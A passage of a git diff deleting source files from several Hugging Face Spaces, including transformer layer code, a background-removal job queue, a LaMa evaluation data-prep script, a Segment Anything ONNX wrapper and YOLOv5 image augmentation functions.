tokens and positions - - if isinstance(self.embed_tokens, nn.ModuleList): - x_embed_list = [] - for embed_tokens_part in self.embed_tokens: - x_embed_list.append(embed_tokens_part(prev_output_tokens)) - - x = self.embed_scale * torch.cat(x_embed_list, dim=-1) - else: - x = self.embed_scale * self.embed_tokens(prev_output_tokens) - - if self.project_in_dim is not None: - x = self.project_in_dim(x) - - if positions is not None: - x += positions - x = F.dropout(x, p=self.dropout, training=self.training) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - if mt_task: - return (x, encoder_out, encoder_padding_mask) - return x - - -class TransformerDecoderOutputLayer(nn.Module): - def __init__(self, args, embed_tokens, dictionary): - super().__init__() - self.share_input_output_embed = args.share_decoder_input_output_embed - self.embed_tokens = embed_tokens - self.output_embed_dim = args.decoder_output_dim - embed_dim = args.decoder_embed_dim - - self.project_out_dim = ( - Linear(embed_dim, self.output_embed_dim, bias=False) - if embed_dim != self.output_embed_dim and not args.tie_adaptive_weights - else None - ) - self.adaptive_softmax = None - if args.adaptive_softmax_cutoff is not None: - assert not isinstance(embed_tokens, nn.ModuleList) - self.adaptive_softmax = AdaptiveSoftmax( - len(dictionary), - self.output_embed_dim, - options.eval_str_list(args.adaptive_softmax_cutoff, type=int), - dropout=args.adaptive_softmax_dropout, - adaptive_inputs=embed_tokens if args.tie_adaptive_weights else None, - factor=args.adaptive_softmax_factor, - tie_proj=args.tie_adaptive_proj, - ) - elif not self.share_input_output_embed: - self.embed_tokens = nn.Parameter( - torch.Tensor(len(dictionary), self.output_embed_dim) - ) - nn.init.normal_( - self.embed_tokens, mean=0, std=self.output_embed_dim ** -0.5 - ) - - if args.decoder_normalize_before and not getattr( - args, "no_decoder_final_norm", False - ): - self.layer_norm = LayerNorm(embed_dim) - else: - self.layer_norm = None - - def forward(self, input, apply_final_proj=True): - if isinstance(input, tuple): - x = input[0] - else: - x = input - - if self.layer_norm: - x = self.layer_norm(x) - - # T x B x C -> B x T x C - x = x.transpose(0, 1) 
- - if self.project_out_dim is not None: - x = self.project_out_dim(x) - if apply_final_proj: - x = self.output_layer(x) - return x - - def output_layer(self, features, **kwargs): - """Project features to the vocabulary size.""" - if self.adaptive_softmax is None: - # project back to size of vocabulary - if self.share_input_output_embed: - if isinstance(self.embed_tokens, nn.ModuleList): - output = None - for i, emb in enumerate(self.embed_tokens): - sidx = i * emb.embedding_dim - eidx = (i + 1) * emb.embedding_dim - if output is None: - output = F.linear(features[:, :, sidx:eidx], emb.weight) - else: - output += F.linear(features[:, :, sidx:eidx], emb.weight) - - return output - else: - return F.linear(features, self.embed_tokens.weight) - else: - return F.linear(features, self.embed_tokens) - else: - return features - - -class TransformerEncoderLayer(nn.Module): - """Encoder layer block. - In the original paper each operation (multi-head attention or FFN) is - postprocessed with: `dropout -> add residual -> layernorm`. In the - tensor2tensor code they suggest that learning is more robust when - preprocessing each layer with layernorm and postprocessing with: - `dropout -> add residual`. We default to the approach in the paper, but the - tensor2tensor approach can be enabled by setting - *args.encoder_normalize_before* to ``True``. - - Args: - args (argparse.Namespace): parsed command-line arguments - """ - - def __init__(self, args): - super().__init__() - self.embed_dim = args.encoder_embed_dim - self.self_attn = MultiheadAttention( - self.embed_dim, - args.encoder_attention_heads, - dropout=args.attention_dropout, - self_attention=True, - ) - self.self_attn_layer_norm = LayerNorm(self.embed_dim) - self.dropout = args.dropout - self.activation_fn = utils.get_activation_fn( - activation=getattr(args, "activation_fn", "relu") - ) - self.activation_dropout = getattr(args, "activation_dropout", 0) - if self.activation_dropout == 0: - # for backwards compatibility with models that use args.relu_dropout - self.activation_dropout = getattr(args, "relu_dropout", 0) - self.normalize_before = args.encoder_normalize_before - self.fc1 = Linear(self.embed_dim, args.encoder_ffn_embed_dim) - self.fc2 = Linear(args.encoder_ffn_embed_dim, self.embed_dim) - self.final_layer_norm = LayerNorm(self.embed_dim) - - def upgrade_state_dict_named(self, state_dict, name): - """ - Rename layer norm states from `...layer_norms.0.weight` to - `...self_attn_layer_norm.weight` and `...layer_norms.1.weight` to - `...final_layer_norm.weight` - """ - layer_norm_map = {"0": "self_attn_layer_norm", "1": "final_layer_norm"} - for old, new in layer_norm_map.items(): - for m in ("weight", "bias"): - k = "{}.layer_norms.{}.{}".format(name, old, m) - if k in state_dict: - state_dict["{}.{}.{}".format(name, new, m)] = state_dict[k] - del state_dict[k] - - def forward(self, input): - """ - Args: - input (Tuple): - input[0] (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - input[1] (ByteTensor/FloatTensor): encoder padding mask - - binary ByteTensor of shape `(batch, src_len)` where padding elements - are indicated by ``1``. 
- input[2] (LongTensor): previous decoder outputs of shape - `(batch, tgt_len)`, for teacher forcing) - Returns: - output (Tuple): - output[0] (Tensor): encoded output of shape `(batch, src_len, embed_dim)` - output[1] (ByteTensor/FloatTensor): encoder padding mask - output[2] (LongTensor): previous decoder outputs - """ - x = input[0] - encoder_padding_mask = input[1] - prev_output_tokens = input[2] - residual = x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, before=True) - x, _ = self.self_attn( - query=x, key=x, value=x, key_padding_mask=encoder_padding_mask - ) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, after=True) - - residual = x - x = self.maybe_layer_norm(self.final_layer_norm, x, before=True) - x = self.activation_fn(self.fc1(x)) - x = F.dropout(x, p=self.activation_dropout, training=self.training) - x = self.fc2(x) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.final_layer_norm, x, after=True) - return (x, encoder_padding_mask, prev_output_tokens) - - def maybe_layer_norm(self, layer_norm, x, before=False, after=False): - assert before ^ after - if after ^ self.normalize_before: - return layer_norm(x) - else: - return x - - -class TransformerDecoderLayer(nn.Module): - """Decoder layer block. - - In the original paper each operation (multi-head attention, encoder - attention or FFN) is postprocessed with: `dropout -> add residual -> - layernorm`. In the tensor2tensor code they suggest that learning is more - robust when preprocessing each layer with layernorm and postprocessing with: - `dropout -> add residual`. We default to the approach in the paper, but the - tensor2tensor approach can be enabled by setting - *args.decoder_normalize_before* to ``True``. - - Args: - args (argparse.Namespace): parsed command-line arguments - no_encoder_attn (bool, optional): whether to attend to encoder outputs - (default: False). - """ - - def __init__( - self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False - ): - super().__init__() - self.embed_dim = args.decoder_embed_dim - self.self_attn = MultiheadAttention( - embed_dim=self.embed_dim, - num_heads=args.decoder_attention_heads, - dropout=args.attention_dropout, - add_bias_kv=add_bias_kv, - add_zero_attn=add_zero_attn, - self_attention=True, - ) - self.dropout = args.dropout - self.activation_fn = utils.get_activation_fn( - activation=getattr(args, "activation_fn", "relu") - ) - self.activation_dropout = getattr(args, "activation_dropout", 0) - if self.activation_dropout == 0: - # for backwards compatibility with models that use args.relu_dropout - self.activation_dropout = getattr(args, "relu_dropout", 0) - self.normalize_before = args.decoder_normalize_before - - # use layerNorm rather than FusedLayerNorm for exporting. - # char_inputs can be used to determint this. 
- # TODO remove this once we update apex with the fix - export = getattr(args, "char_inputs", False) - self.self_attn_layer_norm = LayerNorm(self.embed_dim, export=export) - - if no_encoder_attn: - self.encoder_attn = None - self.encoder_attn_layer_norm = None - else: - self.encoder_attn = MultiheadAttention( - self.embed_dim, - args.decoder_attention_heads, - kdim=getattr(args, "encoder_embed_dim", None), - vdim=getattr(args, "encoder_embed_dim", None), - dropout=args.attention_dropout, - encoder_decoder_attention=True, - ) - self.encoder_attn_layer_norm = LayerNorm(self.embed_dim, export=export) - - self.fc1 = Linear(self.embed_dim, args.decoder_ffn_embed_dim) - self.fc2 = Linear(args.decoder_ffn_embed_dim, self.embed_dim) - - self.final_layer_norm = LayerNorm(self.embed_dim, export=export) - self.need_attn = True - - self.onnx_trace = False - - def prepare_for_onnx_export_(self): - self.onnx_trace = True - - def forward(self, input): - """ - Args: - input (Tuple): - input[0] (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - input[1] (Tensor): encoder output of shape `(batch, src_len, embed_dim)` - input[2] (ByteTensor/FloatTensor): encoder padding mask - - binary ByteTensor of shape `(batch, src_len)` where padding elements - are indicated by ``1``. - Returns: - output (Tuple): - output[0] (Tensor): encoded output of shape `(batch, src_len, embed_dim)` - output[1] (ByteTensor/FloatTensor): encoder padding mask - output[2] (LongTensor): previous decoder outputs - """ - # Note: incremental state is not yet supported - mt_task = False - if isinstance(input, tuple): - x = input[0] - encoder_out = input[1] - encoder_padding_mask = input[2] - incremental_state = None - mt_task = True - else: - x = input - encoder_out = None - encoder_padding_mask = None - incremental_state = None - - if incremental_state is None: - self_attn_mask = self.buffered_future_mask(x) - else: - self_attn_mask = None - - # TODO: add back prev_self_attn_state, prev_attn_state, - # self_attn_padding_mask - prev_self_attn_state = None - prev_attn_state = None - self_attn_padding_mask = None - - residual = x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, before=True) - if prev_self_attn_state is not None: - if incremental_state is None: - incremental_state = {} - prev_key, prev_value = prev_self_attn_state - saved_state = {"prev_key": prev_key, "prev_value": prev_value} - self.self_attn._set_input_buffer(incremental_state, saved_state) - x, attn = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=self_attn_padding_mask, - incremental_state=incremental_state, - need_weights=False, - attn_mask=self_attn_mask, - ) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, after=True) - - if self.encoder_attn is not None: - residual = x - x = self.maybe_layer_norm(self.encoder_attn_layer_norm, x, before=True) - if prev_attn_state is not None: - if incremental_state is None: - incremental_state = {} - prev_key, prev_value = prev_attn_state - saved_state = {"prev_key": prev_key, "prev_value": prev_value} - self.encoder_attn._set_input_buffer(incremental_state, saved_state) - x, attn = self.encoder_attn( - query=x, - key=encoder_out, - value=encoder_out, - key_padding_mask=encoder_padding_mask, - incremental_state=incremental_state, - static_kv=True, - need_weights=(not self.training and self.need_attn), - ) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = 
self.maybe_layer_norm(self.encoder_attn_layer_norm, x, after=True) - - residual = x - x = self.maybe_layer_norm(self.final_layer_norm, x, before=True) - x = self.activation_fn(self.fc1(x)) - x = F.dropout(x, p=self.activation_dropout, training=self.training) - x = self.fc2(x) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.final_layer_norm, x, after=True) - - if mt_task: - return (x, encoder_out, encoder_padding_mask) - return x - - def buffered_future_mask(self, tensor): - dim = tensor.size(0) - if ( - not hasattr(self, "_future_mask") - or self._future_mask is None - or self._future_mask.device != tensor.device - ): - self._future_mask = torch.triu( - utils.fill_with_neg_inf(tensor.new(dim, dim)), 1 - ) - if self._future_mask.size(0) < dim: - self._future_mask = torch.triu( - utils.fill_with_neg_inf(self._future_mask.resize_(dim, dim)), 1 - ) - return self._future_mask[:dim, :dim] - - def maybe_layer_norm(self, layer_norm, x, before=False, after=False): - assert before ^ after - if after ^ self.normalize_before: - return layer_norm(x) - else: - return x - - def make_generation_fast_(self, need_attn=False, **kwargs): - self.need_attn = need_attn - - -def Embedding(num_embeddings, embedding_dim, padding_idx): - m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) - nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) - nn.init.constant_(m.weight[padding_idx], 0) - return m - - -def Linear(in_features, out_features, bias=True): - m = nn.Linear(in_features, out_features, bias) - nn.init.xavier_uniform_(m.weight) - if bias: - nn.init.constant_(m.bias, 0.0) - return m diff --git a/spaces/mygyasir/fast_diffusion/style.css b/spaces/mygyasir/fast_diffusion/style.css deleted file mode 100644 index 03d1292739ba897b789ded3d0b2be2d2bd266b8f..0000000000000000000000000000000000000000 --- a/spaces/mygyasir/fast_diffusion/style.css +++ /dev/null @@ -1,5 +0,0 @@ -.gr-button { - color: white; - border-color: #000000; - background: #006699; -} \ No newline at end of file diff --git a/spaces/mygyasir/genious_bgremover/carvekit/web/utils/task_queue.py b/spaces/mygyasir/genious_bgremover/carvekit/web/utils/task_queue.py deleted file mode 100644 index f821434fcbfc3a94128bee1d1406c6826884f6a9..0000000000000000000000000000000000000000 --- a/spaces/mygyasir/genious_bgremover/carvekit/web/utils/task_queue.py +++ /dev/null @@ -1,114 +0,0 @@ -import gc -import threading -import time -import uuid -from typing import Optional - -from loguru import logger - -from carvekit.api.interface import Interface -from carvekit.web.schemas.config import WebAPIConfig -from carvekit.web.utils.init_utils import init_interface -from carvekit.web.other.removebg import process_remove_bg - - -class MLProcessor(threading.Thread): - """Simple ml task queue processor""" - - def __init__(self, api_config: WebAPIConfig): - super().__init__() - self.api_config = api_config - self.interface: Optional[Interface] = None - self.jobs = {} - self.completed_jobs = {} - - def run(self): - """Starts listening for new jobs.""" - unused_completed_jobs_timer = time.time() - if self.interface is None: - self.interface = init_interface(self.api_config) - while True: - # Clear unused completed jobs every hour - if time.time() - unused_completed_jobs_timer > 60: - self.clear_old_completed_jobs() - unused_completed_jobs_timer = time.time() - - if len(self.jobs.keys()) >= 1: - id = list(self.jobs.keys())[0] - data = self.jobs[id] - # TODO add pydantic scheme here - 
response = process_remove_bg( - self.interface, data[0], data[1], data[2], data[3] - ) - self.completed_jobs[id] = [response, time.time()] - try: - del self.jobs[id] - except KeyError or NameError as e: - logger.error(f"Something went wrong with Task Queue: {str(e)}") - gc.collect() - else: - time.sleep(1) - continue - - def clear_old_completed_jobs(self): - """Clears old completed jobs""" - - if len(self.completed_jobs.keys()) >= 1: - for job_id in self.completed_jobs.keys(): - job_finished_time = self.completed_jobs[job_id][1] - if time.time() - job_finished_time > 3600: - try: - del self.completed_jobs[job_id] - except KeyError or NameError as e: - logger.error(f"Something went wrong with Task Queue: {str(e)}") - gc.collect() - - def job_status(self, id: str) -> str: - """ - Returns current job status - - Args: - id: id of the job - - Returns: - Current job status for specified id. Job status can be [finished, wait, not_found] - """ - if id in self.completed_jobs.keys(): - return "finished" - elif id in self.jobs.keys(): - return "wait" - else: - return "not_found" - - def job_result(self, id: str): - """ - Returns job processing result. - - Args: - id: id of the job - - Returns: - job processing result. - """ - if id in self.completed_jobs.keys(): - data = self.completed_jobs[id][0] - try: - del self.completed_jobs[id] - except KeyError or NameError: - pass - return data - else: - return False - - def job_create(self, data: list): - """ - Send job to ML Processor - - Args: - data: data object - """ - if self.is_alive() is False: - self.start() - id = uuid.uuid4().hex - self.jobs[id] = data - return id diff --git a/spaces/myrad01/Inpaint-Anything/third_party/lama/fetch_data/places_standard_evaluation_prepare_data.sh b/spaces/myrad01/Inpaint-Anything/third_party/lama/fetch_data/places_standard_evaluation_prepare_data.sh deleted file mode 100644 index 2962ac8c843c84a467679887cb4aab60bd73917a..0000000000000000000000000000000000000000 --- a/spaces/myrad01/Inpaint-Anything/third_party/lama/fetch_data/places_standard_evaluation_prepare_data.sh +++ /dev/null @@ -1,52 +0,0 @@ -# 0. folder preparation -mkdir -p places_standard_dataset/evaluation/hires/ -mkdir -p places_standard_dataset/evaluation/random_thick_512/ -mkdir -p places_standard_dataset/evaluation/random_thin_512/ -mkdir -p places_standard_dataset/evaluation/random_medium_512/ -mkdir -p places_standard_dataset/evaluation/random_thick_256/ -mkdir -p places_standard_dataset/evaluation/random_thin_256/ -mkdir -p places_standard_dataset/evaluation/random_medium_256/ - -# 1. sample 30000 new images -OUT=$(python3 fetch_data/eval_sampler.py) -echo ${OUT} - -FILELIST=$(cat places_standard_dataset/original/eval_random_files.txt) -for i in $FILELIST -do - $(cp ${i} places_standard_dataset/evaluation/hires/) -done - - -# 2. 
generate all kinds of masks - -# all 512 -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thick_512.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thick_512/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thin_512.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thin_512/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_medium_512.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_medium_512/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thick_256.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thick_256/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thin_256.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thin_256/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_medium_256.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_medium_256/ diff --git a/spaces/myrad01/Inpaint-Anything/third_party/segment-anything/segment_anything/utils/onnx.py b/spaces/myrad01/Inpaint-Anything/third_party/segment-anything/segment_anything/utils/onnx.py deleted file mode 100644 index 3196bdf4b782e6eeb3da4ad66ef3c7b1741535fe..0000000000000000000000000000000000000000 --- a/spaces/myrad01/Inpaint-Anything/third_party/segment-anything/segment_anything/utils/onnx.py +++ /dev/null @@ -1,144 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import torch -import torch.nn as nn -from torch.nn import functional as F - -from typing import Tuple - -from ..modeling import Sam -from .amg import calculate_stability_score - - -class SamOnnxModel(nn.Module): - """ - This model should not be called directly, but is used in ONNX export. - It combines the prompt encoder, mask decoder, and mask postprocessing of Sam, - with some functions modified to enable model tracing. Also supports extra - options controlling what information. See the ONNX export script for details. 
- """ - - def __init__( - self, - model: Sam, - return_single_mask: bool, - use_stability_score: bool = False, - return_extra_metrics: bool = False, - ) -> None: - super().__init__() - self.mask_decoder = model.mask_decoder - self.model = model - self.img_size = model.image_encoder.img_size - self.return_single_mask = return_single_mask - self.use_stability_score = use_stability_score - self.stability_score_offset = 1.0 - self.return_extra_metrics = return_extra_metrics - - @staticmethod - def resize_longest_image_size( - input_image_size: torch.Tensor, longest_side: int - ) -> torch.Tensor: - input_image_size = input_image_size.to(torch.float32) - scale = longest_side / torch.max(input_image_size) - transformed_size = scale * input_image_size - transformed_size = torch.floor(transformed_size + 0.5).to(torch.int64) - return transformed_size - - def _embed_points(self, point_coords: torch.Tensor, point_labels: torch.Tensor) -> torch.Tensor: - point_coords = point_coords + 0.5 - point_coords = point_coords / self.img_size - point_embedding = self.model.prompt_encoder.pe_layer._pe_encoding(point_coords) - point_labels = point_labels.unsqueeze(-1).expand_as(point_embedding) - - point_embedding = point_embedding * (point_labels != -1) - point_embedding = point_embedding + self.model.prompt_encoder.not_a_point_embed.weight * ( - point_labels == -1 - ) - - for i in range(self.model.prompt_encoder.num_point_embeddings): - point_embedding = point_embedding + self.model.prompt_encoder.point_embeddings[ - i - ].weight * (point_labels == i) - - return point_embedding - - def _embed_masks(self, input_mask: torch.Tensor, has_mask_input: torch.Tensor) -> torch.Tensor: - mask_embedding = has_mask_input * self.model.prompt_encoder.mask_downscaling(input_mask) - mask_embedding = mask_embedding + ( - 1 - has_mask_input - ) * self.model.prompt_encoder.no_mask_embed.weight.reshape(1, -1, 1, 1) - return mask_embedding - - def mask_postprocessing(self, masks: torch.Tensor, orig_im_size: torch.Tensor) -> torch.Tensor: - masks = F.interpolate( - masks, - size=(self.img_size, self.img_size), - mode="bilinear", - align_corners=False, - ) - - prepadded_size = self.resize_longest_image_size(orig_im_size, self.img_size).to(torch.int64) - masks = masks[..., : prepadded_size[0], : prepadded_size[1]] # type: ignore - - orig_im_size = orig_im_size.to(torch.int64) - h, w = orig_im_size[0], orig_im_size[1] - masks = F.interpolate(masks, size=(h, w), mode="bilinear", align_corners=False) - return masks - - def select_masks( - self, masks: torch.Tensor, iou_preds: torch.Tensor, num_points: int - ) -> Tuple[torch.Tensor, torch.Tensor]: - # Determine if we should return the multiclick mask or not from the number of points. - # The reweighting is used to avoid control flow. 
- score_reweight = torch.tensor( - [[1000] + [0] * (self.model.mask_decoder.num_mask_tokens - 1)] - ).to(iou_preds.device) - score = iou_preds + (num_points - 2.5) * score_reweight - best_idx = torch.argmax(score, dim=1) - masks = masks[torch.arange(masks.shape[0]), best_idx, :, :].unsqueeze(1) - iou_preds = iou_preds[torch.arange(masks.shape[0]), best_idx].unsqueeze(1) - - return masks, iou_preds - - @torch.no_grad() - def forward( - self, - image_embeddings: torch.Tensor, - point_coords: torch.Tensor, - point_labels: torch.Tensor, - mask_input: torch.Tensor, - has_mask_input: torch.Tensor, - orig_im_size: torch.Tensor, - ): - sparse_embedding = self._embed_points(point_coords, point_labels) - dense_embedding = self._embed_masks(mask_input, has_mask_input) - - masks, scores = self.model.mask_decoder.predict_masks( - image_embeddings=image_embeddings, - image_pe=self.model.prompt_encoder.get_dense_pe(), - sparse_prompt_embeddings=sparse_embedding, - dense_prompt_embeddings=dense_embedding, - ) - - if self.use_stability_score: - scores = calculate_stability_score( - masks, self.model.mask_threshold, self.stability_score_offset - ) - - if self.return_single_mask: - masks, scores = self.select_masks(masks, scores, point_coords.shape[1]) - - upscaled_masks = self.mask_postprocessing(masks, orig_im_size) - - if self.return_extra_metrics: - stability_scores = calculate_stability_score( - upscaled_masks, self.model.mask_threshold, self.stability_score_offset - ) - areas = (upscaled_masks > self.model.mask_threshold).sum(-1).sum(-1) - return upscaled_masks, scores, stability_scores, areas, masks - - return upscaled_masks, scores, masks diff --git a/spaces/nakamura196/yolov5-ndl-layout/ultralytics/yolov5/utils/augmentations.py b/spaces/nakamura196/yolov5-ndl-layout/ultralytics/yolov5/utils/augmentations.py deleted file mode 100644 index 0311b97b63db29d482eac00573b1de774a974338..0000000000000000000000000000000000000000 --- a/spaces/nakamura196/yolov5-ndl-layout/ultralytics/yolov5/utils/augmentations.py +++ /dev/null @@ -1,277 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Image augmentation functions -""" - -import math -import random - -import cv2 -import numpy as np - -from utils.general import LOGGER, check_version, colorstr, resample_segments, segment2box -from utils.metrics import bbox_ioa - - -class Albumentations: - # YOLOv5 Albumentations class (optional, only used if package is installed) - def __init__(self): - self.transform = None - try: - import albumentations as A - check_version(A.__version__, '1.0.3', hard=True) # version requirement - - self.transform = A.Compose([ - A.Blur(p=0.01), - A.MedianBlur(p=0.01), - A.ToGray(p=0.01), - A.CLAHE(p=0.01), - A.RandomBrightnessContrast(p=0.0), - A.RandomGamma(p=0.0), - A.ImageCompression(quality_lower=75, p=0.0)], - bbox_params=A.BboxParams(format='yolo', label_fields=['class_labels'])) - - LOGGER.info(colorstr('albumentations: ') + ', '.join(f'{x}' for x in self.transform.transforms if x.p)) - except ImportError: # package not installed, skip - pass - except Exception as e: - LOGGER.info(colorstr('albumentations: ') + f'{e}') - - def __call__(self, im, labels, p=1.0): - if self.transform and random.random() < p: - new = self.transform(image=im, bboxes=labels[:, 1:], class_labels=labels[:, 0]) # transformed - im, labels = new['image'], np.array([[c, *b] for c, b in zip(new['class_labels'], new['bboxes'])]) - return im, labels - - -def augment_hsv(im, hgain=0.5, sgain=0.5, vgain=0.5): - # HSV color-space augmentation - if hgain or 
sgain or vgain: - r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains - hue, sat, val = cv2.split(cv2.cvtColor(im, cv2.COLOR_BGR2HSV)) - dtype = im.dtype # uint8 - - x = np.arange(0, 256, dtype=r.dtype) - lut_hue = ((x * r[0]) % 180).astype(dtype) - lut_sat = np.clip(x * r[1], 0, 255).astype(dtype) - lut_val = np.clip(x * r[2], 0, 255).astype(dtype) - - im_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))) - cv2.cvtColor(im_hsv, cv2.COLOR_HSV2BGR, dst=im) # no return needed - - -def hist_equalize(im, clahe=True, bgr=False): - # Equalize histogram on BGR image 'im' with im.shape(n,m,3) and range 0-255 - yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV) - if clahe: - c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8)) - yuv[:, :, 0] = c.apply(yuv[:, :, 0]) - else: - yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram - return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB - - -def replicate(im, labels): - # Replicate labels - h, w = im.shape[:2] - boxes = labels[:, 1:].astype(int) - x1, y1, x2, y2 = boxes.T - s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels) - for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices - x1b, y1b, x2b, y2b = boxes[i] - bh, bw = y2b - y1b, x2b - x1b - yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y - x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh] - im[y1a:y2a, x1a:x2a] = im[y1b:y2b, x1b:x2b] # im4[ymin:ymax, xmin:xmax] - labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0) - - return im, labels - - -def letterbox(im, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32): - # Resize and pad image while meeting stride-multiple constraints - shape = im.shape[:2] # current shape [height, width] - if isinstance(new_shape, int): - new_shape = (new_shape, new_shape) - - # Scale ratio (new / old) - r = min(new_shape[0] / shape[0], new_shape[1] / shape[1]) - if not scaleup: # only scale down, do not scale up (for better val mAP) - r = min(r, 1.0) - - # Compute padding - ratio = r, r # width, height ratios - new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r)) - dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding - if auto: # minimum rectangle - dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding - elif scaleFill: # stretch - dw, dh = 0.0, 0.0 - new_unpad = (new_shape[1], new_shape[0]) - ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios - - dw /= 2 # divide padding into 2 sides - dh /= 2 - - if shape[::-1] != new_unpad: # resize - im = cv2.resize(im, new_unpad, interpolation=cv2.INTER_LINEAR) - top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1)) - left, right = int(round(dw - 0.1)), int(round(dw + 0.1)) - im = cv2.copyMakeBorder(im, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border - return im, ratio, (dw, dh) - - -def random_perspective(im, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, - border=(0, 0)): - # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(0.1, 0.1), scale=(0.9, 1.1), shear=(-10, 10)) - # targets = [cls, xyxy] - - height = im.shape[0] + border[0] * 2 # shape(h,w,c) - width = im.shape[1] + border[1] * 2 - - # Center - C = np.eye(3) - C[0, 2] = -im.shape[1] / 2 # x translation (pixels) - C[1, 2] = -im.shape[0] / 2 # y translation 
(pixels) - - # Perspective - P = np.eye(3) - P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y) - P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x) - - # Rotation and Scale - R = np.eye(3) - a = random.uniform(-degrees, degrees) - # a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations - s = random.uniform(1 - scale, 1 + scale) - # s = 2 ** random.uniform(-scale, scale) - R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s) - - # Shear - S = np.eye(3) - S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg) - S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg) - - # Translation - T = np.eye(3) - T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels) - T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels) - - # Combined rotation matrix - M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT - if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed - if perspective: - im = cv2.warpPerspective(im, M, dsize=(width, height), borderValue=(114, 114, 114)) - else: # affine - im = cv2.warpAffine(im, M[:2], dsize=(width, height), borderValue=(114, 114, 114)) - - # Visualize - # import matplotlib.pyplot as plt - # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel() - # ax[0].imshow(im[:, :, ::-1]) # base - # ax[1].imshow(im2[:, :, ::-1]) # warped - - # Transform label coordinates - n = len(targets) - if n: - use_segments = any(x.any() for x in segments) - new = np.zeros((n, 4)) - if use_segments: # warp segments - segments = resample_segments(segments) # upsample - for i, segment in enumerate(segments): - xy = np.ones((len(segment), 3)) - xy[:, :2] = segment - xy = xy @ M.T # transform - xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine - - # clip - new[i] = segment2box(xy, width, height) - - else: # warp boxes - xy = np.ones((n * 4, 3)) - xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1 - xy = xy @ M.T # transform - xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine - - # create new boxes - x = xy[:, [0, 2, 4, 6]] - y = xy[:, [1, 3, 5, 7]] - new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T - - # clip - new[:, [0, 2]] = new[:, [0, 2]].clip(0, width) - new[:, [1, 3]] = new[:, [1, 3]].clip(0, height) - - # filter candidates - i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if 